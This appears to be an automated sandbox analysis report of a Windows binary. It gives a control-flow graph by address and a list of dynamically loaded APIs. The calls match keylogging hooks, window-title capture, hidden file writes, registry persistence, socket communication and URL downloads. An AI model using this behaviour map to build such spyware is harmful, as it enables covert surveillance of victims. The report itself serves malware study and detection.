47638 43ae2a 47637->47638 47641 43ae2f __cftof 47637->47641 47655 4405dd 20 API calls _free 47638->47655 47641->47152 47643 43ae5c 47644 43ae8b 47643->47644 47657 43ba4f 40 API calls __Tolower 47643->47657 47645 43aef7 47644->47645 47658 43b9b6 20 API calls 2 library calls 47644->47658 47659 43b9b6 20 API calls 2 library calls 47645->47659 47648 43afbe _swprintf 47648->47641 47660 4405dd 20 API calls _free 47648->47660 47651 43ba22 47650->47651 47652 43ba0f 47650->47652 47651->47637 47661 4405dd 20 API calls _free 47652->47661 47654 43ba14 __cftof 47654->47637 47655->47641 47656->47643 47657->47643 47658->47645 47659->47648 47660->47641 47661->47654 47668 401fb0 47662->47668 47664 402f1e 47665 402055 11 API calls 47664->47665 47666 402f2d 47665->47666 47666->47166 47667->47169 47669 4025f0 28 API calls 47668->47669 47670 401fbd 47669->47670 47670->47664 47672 40a127 47671->47672 47673 413549 3 API calls 47672->47673 47674 40a12e 47673->47674 47675 40a142 47674->47675 47676 40a15c 47674->47676 47678 409e9b 47675->47678 47679 40a147 47675->47679 47692 40905c 47676->47692 47678->46901 47680 40905c 28 API calls 47679->47680 47682 40a155 47680->47682 47720 40a22d 29 API calls 47682->47720 47685 40a15a 47685->47678 47686->47195 47868 403222 47687->47868 47689 403022 47872 403262 47689->47872 47693 409072 47692->47693 47694 402252 11 API calls 47693->47694 47695 40908c 47694->47695 47721 404267 47695->47721 47697 40909a 47698 40a179 47697->47698 47733 40b8ec 47698->47733 47701 40a1a2 47704 402093 28 API calls 47701->47704 47702 40a1ca 47703 402093 28 API calls 47702->47703 47705 40a1d5 47703->47705 47706 40a1ac 47704->47706 47707 402093 28 API calls 47705->47707 47708 41bc5e 28 API calls 47706->47708 47709 40a1e4 47707->47709 47710 40a1ba 47708->47710 47711 41b4ef 80 API calls 47709->47711 47737 40b164 31 API calls new 47710->47737 47713 40a1e9 CreateThread 47711->47713 47716 40a210 CreateThread 47713->47716 47717 40a204 CreateThread 47713->47717 47745 40a27d 47713->47745 47714 40a1c1 47715 401fd8 11 API calls 47714->47715 47715->47702 47718 401f09 11 API calls 47716->47718 47742 40a289 47716->47742 47717->47716 47739 40a267 47717->47739 47719 40a224 47718->47719 47719->47678 47720->47685 47867 40a273 163 API calls 47720->47867 47722 402888 22 API calls 47721->47722 47723 40427b 47722->47723 47724 404290 47723->47724 47725 4042a5 47723->47725 47731 4042df 22 API calls 47724->47731 47727 4027e6 28 API calls 47725->47727 47730 4042a3 47727->47730 47728 404299 47732 402c48 22 API calls 47728->47732 47730->47697 47731->47728 47732->47730 47734 40b8f5 47733->47734 47735 40a197 47733->47735 47738 40b96c 28 API calls 47734->47738 47735->47701 47735->47702 47737->47714 47738->47735 47748 40a2b8 47739->47748 47778 40acd6 47742->47778 47820 40a726 47745->47820 47749 40a2d1 GetModuleHandleA SetWindowsHookExA 47748->47749 47750 40a333 GetMessageA 47748->47750 47749->47750 47752 40a2ed GetLastError 47749->47752 47751 40a345 TranslateMessage DispatchMessageA 47750->47751 47762 40a270 47750->47762 47751->47750 47751->47762 47763 41bb8e 47752->47763 47769 441e81 47763->47769 47766 402093 28 API calls 47767 40a2fe 47766->47767 47768 4052fd 28 API calls 47767->47768 47770 441e8d 47769->47770 47773 441c7d 47770->47773 47772 41bbb2 47772->47766 47774 441c94 47773->47774 47776 441ccb __cftof 47774->47776 47777 4405dd 20 API calls _free 47774->47777 47776->47772 47777->47776 47785 40ace4 47778->47785 47779 40a292 47780 40ad3e Sleep GetForegroundWindow GetWindowTextLengthW 47782 40b904 28 API calls 47780->47782 47782->47785 47785->47779 47785->47780 47787 41bae6 GetTickCount 47785->47787 47788 40ad84 GetWindowTextW 47785->47788 47790 401f09 11 API calls 47785->47790 47791 40aedc 47785->47791 47792 40b8ec 28 API calls 47785->47792 47794 40ae49 Sleep 47785->47794 47795 441e81 20 API calls 47785->47795 47797 402093 28 API calls 47785->47797 47798 40add1 47785->47798 47803 403014 28 API calls 47785->47803 47804 406383 28 API calls 47785->47804 47805 41bc5e 28 API calls 47785->47805 47806 40a636 12 API calls 47785->47806 47807 401fd8 11 API calls 47785->47807 47808 4343e6 EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 47785->47808 47809 401f86 47785->47809 47813 434770 23 API calls __onexit 47785->47813 47814 4343a7 SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 47785->47814 47815 409044 28 API calls 47785->47815 47817 40b97c 28 API calls 47785->47817 47818 40b748 40 API calls 2 library calls 47785->47818 47819 4052fd 28 API calls 47785->47819 47787->47785 47788->47785 47790->47785 47793 401f09 11 API calls 47791->47793 47792->47785 47793->47779 47794->47785 47795->47785 47797->47785 47798->47785 47799 40905c 28 API calls 47798->47799 47816 40b164 31 API calls new 47798->47816 47799->47798 47803->47785 47804->47785 47805->47785 47806->47785 47807->47785 47810 401f8e 47809->47810 47811 402252 11 API calls 47810->47811 47812 401f99 47811->47812 47812->47785 47813->47785 47814->47785 47815->47785 47816->47798 47817->47785 47818->47785 47821 40a73b Sleep 47820->47821 47841 40a675 47821->47841 47823 40a286 47824 40a77b CreateDirectoryW 47831 40a74d 47824->47831 47825 40a78c GetFileAttributesW 47825->47831 47826 40a7a3 SetFileAttributesW 47826->47831 47827 4020df 11 API calls 47839 40a7ee 47827->47839 47829 40a81d PathFileExistsW 47829->47839 47830 401e65 22 API calls 47830->47831 47831->47821 47831->47823 47831->47824 47831->47825 47831->47826 47831->47830 47831->47839 47854 41c3f1 47831->47854 47833 4020b7 28 API calls 47833->47839 47834 40a926 SetFileAttributesW 47834->47831 47835 401fd8 11 API calls 47835->47839 47836 406dd8 28 API calls 47836->47839 47837 401fe2 28 API calls 47837->47839 47839->47827 47839->47829 47839->47833 47839->47834 47839->47835 47839->47836 47839->47837 47840 401fd8 11 API calls 47839->47840 47864 41c485 32 API calls 47839->47864 47865 41c4f2 CreateFileW SetFilePointer CloseHandle WriteFile FindCloseChangeNotification 47839->47865 47840->47831 47842 40a722 47841->47842 47845 40a68b 47841->47845 47842->47831 47843 40a6aa CreateFileW 47844 40a6b8 GetFileSize 47843->47844 47843->47845 47844->47845 47846 40a6ed FindCloseChangeNotification 47844->47846 47845->47843 47845->47846 47847 40a6ff 47845->47847 47848 40a6e2 Sleep 47845->47848 47849 40a6db 47845->47849 47846->47845 47847->47842 47851 40905c 28 API calls 47847->47851 47848->47846 47866 40b0dc 84 API calls 47849->47866 47852 40a71b 47851->47852 47853 40a179 124 API calls 47852->47853 47853->47842 47855 41c404 CreateFileW 47854->47855 47857 41c441 47855->47857 47858 41c43d 47855->47858 47859 41c461 WriteFile 47857->47859 47860 41c448 SetFilePointer 47857->47860 47858->47831 47862 41c474 47859->47862 47863 41c476 FindCloseChangeNotification 47859->47863 47860->47859 47861 41c458 CloseHandle 47860->47861 47861->47858 47862->47863 47863->47858 47864->47839 47865->47839 47866->47848 47869 40322e 47868->47869 47878 403618 47869->47878 47871 40323b 47871->47689 47873 40326e 47872->47873 47874 402252 11 API calls 47873->47874 47875 403288 47874->47875 47876 402336 11 API calls 47875->47876 47877 403031 47876->47877 47877->47199 47879 403626 47878->47879 47880 403644 47879->47880 47881 40362c 47879->47881 47883 40365c 47880->47883 47884 40369e 47880->47884 47889 4036a6 28 API calls 47881->47889 47885 403642 47883->47885 47888 4027e6 28 API calls 47883->47888 47890 4028a4 22 API calls 47884->47890 47885->47871 47888->47885 47889->47885 47892 404186 47891->47892 47893 402252 11 API calls 47892->47893 47894 404191 47893->47894 47902 4041bc 47894->47902 47897 4042fc 47913 404353 47897->47913 47899 40430a 47900 403262 11 API calls 47899->47900 47901 404319 47900->47901 47901->47207 47903 4041c8 47902->47903 47906 4041d9 47903->47906 47905 40419c 47905->47897 47907 4041e9 47906->47907 47908 404206 47907->47908 47909 4041ef 47907->47909 47910 4027e6 28 API calls 47908->47910 47911 404267 28 API calls 47909->47911 47912 404204 47910->47912 47911->47912 47912->47905 47914 40435f 47913->47914 47917 404371 47914->47917 47916 40436d 47916->47899 47918 40437f 47917->47918 47919 404385 47918->47919 47920 40439e 47918->47920 47983 4034e6 28 API calls 47919->47983 47921 402888 22 API calls 47920->47921 47922 4043a6 47921->47922 47924 404419 47922->47924 47925 4043bf 47922->47925 47984 4028a4 22 API calls 47924->47984 47927 4027e6 28 API calls 47925->47927 47937 40439c 47925->47937 47927->47937 47937->47916 47983->47937 47991 43aa9a 47985->47991 47989 4138b9 47988->47989 47990 41388f RegSetValueExA RegCloseKey 47988->47990 47989->47223 47990->47989 47994 43aa1b 47991->47994 47993 40170d 47993->47225 47995 43aa2a 47994->47995 47996 43aa3e 47994->47996 48000 4405dd 20 API calls _free 47995->48000 47999 43aa2f __alldvrm __cftof 47996->47999 48001 448957 11 API calls 2 library calls 47996->48001 47999->47993 48000->47999 48001->47999 48003 41b8f9 _Yarn ___scrt_fastfail 48002->48003 48004 402093 28 API calls 48003->48004 48005 414f49 48004->48005 48005->47232 48006->47249 48008 414f02 getaddrinfo WSASetLastError 48007->48008 48009 414ef8 48007->48009 48008->47300 48149 414d86 29 API calls ___std_exception_copy 48009->48149 48011 414efd 48011->48008 48013 404846 socket 48012->48013 48014 404839 48012->48014 48015 404860 CreateEventW 48013->48015 48016 404842 48013->48016 48150 40489e WSAStartup 48014->48150 48015->47300 48016->47300 48018 40483e 48018->48013 48018->48016 48020 404f65 48019->48020 48021 404fea 48019->48021 48022 404f6e 48020->48022 48023 404fc0 CreateEventA CreateThread 48020->48023 48024 404f7d GetLocalTime 48020->48024 48021->47300 48022->48023 48023->48021 48152 405150 48023->48152 48025 41bb8e 28 API calls 48024->48025 48026 404f91 48025->48026 48151 4052fd 28 API calls 48026->48151 48035 404a1b 48034->48035 48036 4048ee 48034->48036 48037 40497e 48035->48037 48038 404a21 WSAGetLastError 48035->48038 48036->48037 48040 40531e 28 API calls 48036->48040 48060 404923 48036->48060 48037->47300 48038->48037 48039 404a31 48038->48039 48041 404932 48039->48041 48042 404a36 48039->48042 48044 40490f 48040->48044 48047 402093 28 API calls 48041->48047 48161 41cae1 30 API calls 48042->48161 48048 402093 28 API calls 48044->48048 48046 40492b 48046->48041 48050 404941 48046->48050 48051 404a80 48047->48051 48052 40491e 48048->48052 48049 404a40 48162 4052fd 28 API calls 48049->48162 48057 404950 48050->48057 48058 404987 48050->48058 48054 402093 28 API calls 48051->48054 48055 41b4ef 80 API calls 48052->48055 48059 404a8f 48054->48059 48055->48060 48062 402093 28 API calls 48057->48062 48158 421a40 54 API calls 48058->48158 48063 41b4ef 80 API calls 48059->48063 48156 420c60 27 API calls 48060->48156 48066 40495f 48062->48066 48063->48037 48072 402093 28 API calls 48066->48072 48067 40498f 48069 4049c4 48067->48069 48070 404994 48067->48070 48160 420e06 28 API calls 48069->48160 48073 402093 28 API calls 48070->48073 48075 40496e 48072->48075 48077 4049a3 48073->48077 48078 41b4ef 80 API calls 48075->48078 48080 402093 28 API calls 48077->48080 48081 404973 48078->48081 48079 4049cc 48082 4049f9 CreateEventW CreateEventW 48079->48082 48084 402093 28 API calls 48079->48084 48083 4049b2 48080->48083 48157 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48081->48157 48082->48037 48085 41b4ef 80 API calls 48083->48085 48087 4049e2 48084->48087 48088 4049b7 48085->48088 48089 402093 28 API calls 48087->48089 48159 4210b2 52 API calls 48088->48159 48090 4049f1 48089->48090 48092 41b4ef 80 API calls 48090->48092 48093 4049f6 48092->48093 48093->48082 48163 41b7b6 GlobalMemoryStatusEx 48094->48163 48096 41b7f5 48096->47300 48164 414580 48097->48164 48101 40dda5 48100->48101 48102 4134ff 3 API calls 48101->48102 48104 40ddac 48102->48104 48103 40ddc4 48103->47300 48104->48103 48105 413549 3 API calls 48104->48105 48105->48103 48107 4020b7 28 API calls 48106->48107 48108 41bc57 48107->48108 48108->47300 48110 41bd2b 48109->48110 48111 4020b7 28 API calls 48110->48111 48112 41bd3d 48111->48112 48112->47300 48114 41bafc GetTickCount 48113->48114 48114->47316 48116 436e90 ___scrt_fastfail 48115->48116 48117 41bab5 GetForegroundWindow GetWindowTextW 48116->48117 48118 40417e 28 API calls 48117->48118 48119 41badf 48118->48119 48119->47316 48121 402093 28 API calls 48120->48121 48122 40f8f6 48121->48122 48122->47316 48123->47316 48125 4020df 11 API calls 48124->48125 48126 404c27 48125->48126 48127 4020df 11 API calls 48126->48127 48129 404c30 48127->48129 48128 43bd51 new 21 API calls 48128->48129 48129->48128 48131 4020b7 28 API calls 48129->48131 48132 404c96 48129->48132 48134 401fe2 28 API calls 48129->48134 48136 401fd8 11 API calls 48129->48136 48202 404cc3 48129->48202 48214 404b96 57 API calls 48129->48214 48131->48129 48132->48129 48133 404ca1 48132->48133 48215 404e26 99 API calls 48133->48215 48134->48129 48136->48129 48137 404ca8 48138 401fd8 11 API calls 48137->48138 48139 404cb1 48138->48139 48140 401fd8 11 API calls 48139->48140 48141 404cba 48140->48141 48141->47276 48143->47300 48144->47276 48146->47316 48147->47276 48148->47276 48149->48011 48150->48018 48155 40515c 102 API calls 48152->48155 48154 405159 48155->48154 48156->48046 48157->48037 48158->48067 48159->48081 48160->48079 48161->48049 48163->48096 48167 414553 48164->48167 48168 414568 ___scrt_initialize_default_local_stdio_options 48167->48168 48171 43f79d 48168->48171 48174 43c4f0 48171->48174 48175 43c530 48174->48175 48176 43c518 48174->48176 48175->48176 48178 43c538 48175->48178 48196 4405dd 20 API calls _free 48176->48196 48197 43a7b7 36 API calls 3 library calls 48178->48197 48180 43c548 48198 43cc76 20 API calls 2 library calls 48180->48198 48181 43c51d __cftof 48189 434fcb 48181->48189 48184 43c5c0 48199 43d2e4 51 API calls 3 library calls 48184->48199 48185 414576 48185->47300 48188 43c5cb 48200 43cce0 20 API calls _free 48188->48200 48190 434fd6 IsProcessorFeaturePresent 48189->48190 48191 434fd4 48189->48191 48193 435018 48190->48193 48191->48185 48201 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 48193->48201 48195 4350fb 48195->48185 48196->48181 48197->48180 48198->48184 48199->48188 48200->48181 48201->48195 48203 4020df 11 API calls 48202->48203 48213 404cde 48203->48213 48204 404e13 48205 401fd8 11 API calls 48204->48205 48206 404e1c 48205->48206 48206->48132 48207 4041a2 28 API calls 48207->48213 48208 401fe2 28 API calls 48208->48213 48209 401fd8 11 API calls 48209->48213 48210 4020f6 28 API calls 48210->48213 48211 401fc0 28 API calls 48212 404dad CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 48211->48212 48212->48213 48216 415aea 48212->48216 48213->48204 48213->48207 48213->48208 48213->48209 48213->48210 48213->48211 48214->48129 48215->48137 48217 4020f6 28 API calls 48216->48217 48218 415b0c SetEvent 48217->48218 48219 415b21 48218->48219 48220 4041a2 28 API calls 48219->48220 48221 415b3b 48220->48221 48222 4020f6 28 API calls 48221->48222 48223 415b4b 48222->48223 48224 4020f6 28 API calls 48223->48224 48225 415b5d 48224->48225 48226 41be1b 28 API calls 48225->48226 48227 415b66 48226->48227 48228 417089 48227->48228 48229 415b86 GetTickCount 48227->48229 48230 415d2f 48227->48230 48231 401e8d 11 API calls 48228->48231 48232 41bb8e 28 API calls 48229->48232 48230->48228 48293 415ce5 48230->48293 48233 417092 48231->48233 48234 415b97 48232->48234 48236 401fd8 11 API calls 48233->48236 48237 41bae6 GetTickCount 48234->48237 48238 41709e 48236->48238 48239 415ba3 48237->48239 48240 401fd8 11 API calls 48238->48240 48241 41bb8e 28 API calls 48239->48241 48242 4170aa 48240->48242 48243 415bae 48241->48243 48244 41ba96 30 API calls 48243->48244 48245 415bbc 48244->48245 48246 41bd1e 28 API calls 48245->48246 48247 415bca 48246->48247 48248 401e65 22 API calls 48247->48248 48249 415bd8 48248->48249 48295 402f31 28 API calls 48249->48295 48251 415be6 48296 402ea1 28 API calls 48251->48296 48253 415bf5 48254 402f10 28 API calls 48253->48254 48255 415c04 48254->48255 48297 402ea1 28 API calls 48255->48297 48257 415c13 48258 402f10 28 API calls 48257->48258 48259 415c1f 48258->48259 48298 402ea1 28 API calls 48259->48298 48261 415c29 48299 404aa1 61 API calls _Yarn 48261->48299 48263 415c38 48264 401fd8 11 API calls 48263->48264 48265 415c41 48264->48265 48266 401fd8 11 API calls 48265->48266 48267 415c4d 48266->48267 48268 401fd8 11 API calls 48267->48268 48269 415c59 48268->48269 48270 401fd8 11 API calls 48269->48270 48271 415c65 48270->48271 48272 401fd8 11 API calls 48271->48272 48273 415c71 48272->48273 48274 401fd8 11 API calls 48273->48274 48275 415c7d 48274->48275 48276 401f09 11 API calls 48275->48276 48277 415c86 48276->48277 48278 401fd8 11 API calls 48277->48278 48279 415c8f 48278->48279 48280 401fd8 11 API calls 48279->48280 48281 415c98 48280->48281 48282 401e65 22 API calls 48281->48282 48283 415ca3 48282->48283 48284 43baac 40 API calls 48283->48284 48285 415cb0 48284->48285 48286 415cb5 48285->48286 48287 415cdb 48285->48287 48289 415cc3 48286->48289 48290 415cce 48286->48290 48288 401e65 22 API calls 48287->48288 48288->48293 48300 404ff4 82 API calls 48289->48300 48292 404f51 105 API calls 48290->48292 48294 415cc9 48292->48294 48293->48228 48301 4050e4 84 API calls 48293->48301 48294->48228 48295->48251 48296->48253 48297->48257 48298->48261 48299->48263 48300->48294 48301->48294 48303->47351 48304->47377 48305->47376 48306->47365 48307->47369 48308->47375 48309->47407 48313 40f7c2 48312->48313 48314 413549 3 API calls 48313->48314 48315 40f866 48313->48315 48317 40f856 Sleep 48313->48317 48334 40f7f4 48313->48334 48314->48313 48318 40905c 28 API calls 48315->48318 48316 40905c 28 API calls 48316->48334 48317->48313 48321 40f871 48318->48321 48320 41bc5e 28 API calls 48320->48334 48322 41bc5e 28 API calls 48321->48322 48323 40f87d 48322->48323 48347 413814 14 API calls 48323->48347 48326 401f09 11 API calls 48326->48334 48327 40f890 48328 401f09 11 API calls 48327->48328 48330 40f89c 48328->48330 48329 402093 28 API calls 48329->48334 48331 402093 28 API calls 48330->48331 48332 40f8ad 48331->48332 48335 41376f 14 API calls 48332->48335 48333 41376f 14 API calls 48333->48334 48334->48316 48334->48317 48334->48320 48334->48326 48334->48329 48334->48333 48345 40d096 112 API calls ___scrt_fastfail 48334->48345 48346 413814 14 API calls 48334->48346 48336 40f8c0 48335->48336 48348 412850 TerminateProcess WaitForSingleObject 48336->48348 48338 40f8c8 ExitProcess 48349 4127ee 62 API calls 48340->48349 48346->48334 48347->48327 48348->48338 48350 4269e6 48351 4269fb 48350->48351 48363 426a8d 48350->48363 48352 426a48 48351->48352 48353 426b44 48351->48353 48354 426abd 48351->48354 48355 426b1d 48351->48355 48359 426af2 48351->48359 48362 426a7d 48351->48362 48351->48363 48378 424edd 49 API calls _Yarn 48351->48378 48352->48362 48352->48363 48379 41fb6c 52 API calls 48352->48379 48353->48363 48383 426155 28 API calls 48353->48383 48354->48359 48354->48363 48381 41fb6c 52 API calls 48354->48381 48355->48353 48355->48363 48366 425ae1 48355->48366 48359->48355 48382 4256f0 21 API calls 48359->48382 48362->48354 48362->48363 48380 424edd 49 API calls _Yarn 48362->48380 48368 425b00 ___scrt_fastfail 48366->48368 48367 425b14 48373 425b34 48367->48373 48374 425b1d 48367->48374 48391 41da5f 49 API calls 48367->48391 48370 425b0f 48368->48370 48368->48373 48384 41ebbb 21 API calls 48368->48384 48370->48367 48370->48373 48385 4205d8 46 API calls 48370->48385 48373->48353 48374->48373 48392 424d05 21 API calls 2 library calls 48374->48392 48376 425bb7 48376->48373 48386 432ec4 48376->48386 48378->48352 48379->48352 48380->48354 48381->48354 48382->48355 48383->48363 48384->48370 48385->48376 48387 432ed2 48386->48387 48388 432ece 48386->48388 48389 43bd51 new 21 API calls 48387->48389 48388->48367 48390 432ed7 48389->48390 48390->48367 48391->48374 48392->48373 48393 415d06 48408 41b380 48393->48408 48395 415d0f 48396 4020f6 28 API calls 48395->48396 48397 415d1e 48396->48397 48419 404aa1 61 API calls _Yarn 48397->48419 48399 415d2a 48400 417089 48399->48400 48401 401fd8 11 API calls 48399->48401 48402 401e8d 11 API calls 48400->48402 48401->48400 48403 417092 48402->48403 48404 401fd8 11 API calls 48403->48404 48405 41709e 48404->48405 48406 401fd8 11 API calls 48405->48406 48407 4170aa 48406->48407 48409 4020df 11 API calls 48408->48409 48410 41b38e 48409->48410 48411 43bd51 new 21 API calls 48410->48411 48412 41b39e InternetOpenW InternetOpenUrlW 48411->48412 48413 41b3c5 InternetReadFile 48412->48413 48417 41b3e8 48413->48417 48414 41b415 InternetCloseHandle InternetCloseHandle 48416 41b427 48414->48416 48415 4020b7 28 API calls 48415->48417 48416->48395 48417->48413 48417->48414 48417->48415 48418 401fd8 11 API calls 48417->48418 48418->48417 48419->48399 48420 426c4b 48425 426cc8 send 48420->48425 48426 44375d 48427 44377f 48426->48427 48428 443766 48426->48428 48429 44376e 48428->48429 48433 4437e5 48428->48433 48431 443776 48431->48429 48444 443ab2 22 API calls 2 library calls 48431->48444 48434 4437f1 48433->48434 48435 4437ee 48433->48435 48445 44f3dd GetEnvironmentStringsW 48434->48445 48435->48431 48438 4437fe 48440 446782 _free 20 API calls 48438->48440 48441 443833 48440->48441 48441->48431 48442 443809 48453 446782 48442->48453 48444->48427 48446 4437f8 48445->48446 48447 44f3f1 48445->48447 48446->48438 48452 44390a 26 API calls 3 library calls 48446->48452 48459 446137 48447->48459 48449 44f405 _Yarn 48450 446782 _free 20 API calls 48449->48450 48451 44f41f FreeEnvironmentStringsW 48450->48451 48451->48446 48452->48442 48454 44678d RtlFreeHeap 48453->48454 48458 4467b6 _free 48453->48458 48455 4467a2 48454->48455 48454->48458 48468 4405dd 20 API calls _free 48455->48468 48457 4467a8 GetLastError 48457->48458 48458->48438 48460 446175 48459->48460 48464 446145 __Getctype 48459->48464 48467 4405dd 20 API calls _free 48460->48467 48462 446160 RtlAllocateHeap 48463 446173 48462->48463 48462->48464 48463->48449 48464->48460 48464->48462 48466 442f80 7 API calls 2 library calls 48464->48466 48466->48464 48467->48463 48468->48457 48469 43be58 48470 43be64 _swprintf ___DestructExceptionObject 48469->48470 48471 43be72 48470->48471 48473 43be9c 48470->48473 48485 4405dd 20 API calls _free 48471->48485 48480 445888 EnterCriticalSection 48473->48480 48475 43be77 ___DestructExceptionObject __cftof 48476 43bea7 48481 43bf48 48476->48481 48480->48476 48483 43bf56 48481->48483 48482 43beb2 48486 43becf LeaveCriticalSection std::_Lockit::~_Lockit 48482->48486 48483->48482 48487 44976c 37 API calls 2 library calls 48483->48487 48485->48475 48486->48475 48487->48483 48488 41dfbd 48489 41dfd2 _Yarn ___scrt_fastfail 48488->48489 48491 432ec4 21 API calls 48489->48491 48501 41e1d5 48489->48501 48493 41e182 ___scrt_fastfail 48491->48493 48492 41e1e6 48494 432ec4 21 API calls 48492->48494 48499 41e189 48492->48499 48495 432ec4 21 API calls 48493->48495 48493->48499 48496 41e21f ___scrt_fastfail 48494->48496 48497 41e1af ___scrt_fastfail 48495->48497 48496->48499 48503 43354a 48496->48503 48497->48499 48500 432ec4 21 API calls 48497->48500 48500->48501 48501->48499 48502 41db62 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 48501->48502 48502->48492 48506 433469 48503->48506 48505 433552 48505->48499 48507 433482 48506->48507 48511 433478 48506->48511 48508 432ec4 21 API calls 48507->48508 48507->48511 48509 4334a3 48508->48509 48509->48511 48512 433837 CryptAcquireContextA 48509->48512 48511->48505 48513 433858 CryptGenRandom 48512->48513 48514 433853 48512->48514 48513->48514 48515 43386d CryptReleaseContext 48513->48515 48514->48511 48515->48514 48516 40165e 48517 401666 48516->48517 48518 401669 48516->48518 48519 4016a8 48518->48519 48521 401696 48518->48521 48520 4344ea new 22 API calls 48519->48520 48522 40169c 48520->48522 48523 4344ea new 22 API calls 48521->48523 48523->48522 48524 426bdc 48530 426cb1 recv 48524->48530 48531 42f8ed 48532 42f8f8 48531->48532 48533 42f90c 48532->48533 48535 432eee 48532->48535 48536 432efd 48535->48536 48538 432ef9 48535->48538 48539 440f0d 48536->48539 48538->48533 48540 446185 48539->48540 48541 446192 48540->48541 48542 44619d 48540->48542 48543 446137 ___crtLCMapStringA 21 API calls 48541->48543 48544 4461a5 48542->48544 48550 4461ae __Getctype 48542->48550 48549 44619a 48543->48549 48545 446782 _free 20 API calls 48544->48545 48545->48549 48546 4461b3 48552 4405dd 20 API calls _free 48546->48552 48547 4461d8 RtlReAllocateHeap 48547->48549 48547->48550 48549->48538 48550->48546 48550->48547 48553 442f80 7 API calls 2 library calls 48550->48553 48552->48549 48553->48550

                              Control-flow Graph

                              APIs
                              • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                              • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                              • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                              • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                              • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                              • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                              • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                              • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                              • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                              • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                              • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                              • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                              • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                              • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                              • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                              • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
